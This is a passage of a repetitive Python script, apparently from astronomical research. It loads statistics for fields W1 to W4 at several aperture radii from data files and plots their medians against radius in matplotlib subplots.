usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nplt.subplot(4,5,14)\nrangemax=6\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nax=plt.subplot(4,5,14)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\\zeta_\\frac{M^3}{r}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 12\n\ncols=25\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nx = linspace(0,3,500)\n\n\n\nplt.subplot(4,5,16)\nrangemax=4\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(4,5,16)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'${\\zeta_\\frac{M_{rms}^2}{r}}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 13\n\ncols=27\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nx = linspace(0,3,500)\n\n\n\nplt.subplot(4,5,17)\nrangemax=5\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nax=plt.subplot(4,5,17)\n#s = \"50: %.3f,%.3f,%.3f\" % 